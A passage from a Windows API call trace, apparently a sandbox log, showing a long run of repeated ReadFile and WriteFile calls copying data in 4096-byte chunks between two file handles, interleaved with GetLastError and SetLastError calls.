lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] GetLastError () returned 0x0 [0079.617] SetLastError (dwErrCode=0x0) [0079.617] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.617] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.618] GetLastError () returned 0x0 [0079.618] SetLastError (dwErrCode=0x0) [0079.618] GetLastError () returned 0x0 [0079.618] SetLastError (dwErrCode=0x0) [0079.618] GetLastError () returned 0x0 [0079.618] SetLastError (dwErrCode=0x0) [0079.618] GetLastError () returned 0x0 [0079.618] SetLastError (dwErrCode=0x0) [0079.618] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.618] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.618] GetLastError () returned 0x0 [0079.618] SetLastError (dwErrCode=0x0) [0079.618] GetLastError () returned 0x0 [0079.618] SetLastError (dwErrCode=0x0) [0079.619] GetLastError () returned 0x0 [0079.619] SetLastError (dwErrCode=0x0) [0079.619] GetLastError () returned 0x0 [0079.619] SetLastError (dwErrCode=0x0) [0079.619] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.619] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.619] GetLastError () returned 0x0 [0079.619] SetLastError (dwErrCode=0x0) [0079.619] GetLastError () returned 0x0 [0079.619] SetLastError (dwErrCode=0x0) [0079.619] GetLastError () returned 0x0 [0079.619] SetLastError (dwErrCode=0x0) [0079.619] GetLastError () returned 0x0 [0079.619] SetLastError (dwErrCode=0x0) [0079.619] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.619] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.620] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] GetLastError () returned 0x0 [0079.620] SetLastError (dwErrCode=0x0) [0079.620] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.620] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.621] GetLastError () returned 0x0 [0079.621] SetLastError (dwErrCode=0x0) [0079.621] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.621] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.621] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.621] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.621] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.621] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.622] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.622] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.622] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.622] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.624] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.625] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.625] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.625] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.625] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.625] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.625] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.627] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.627] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.627] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.627] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.627] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.627] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.628] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.628] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.628] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.629] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.630] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.631] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.632] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.634] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, 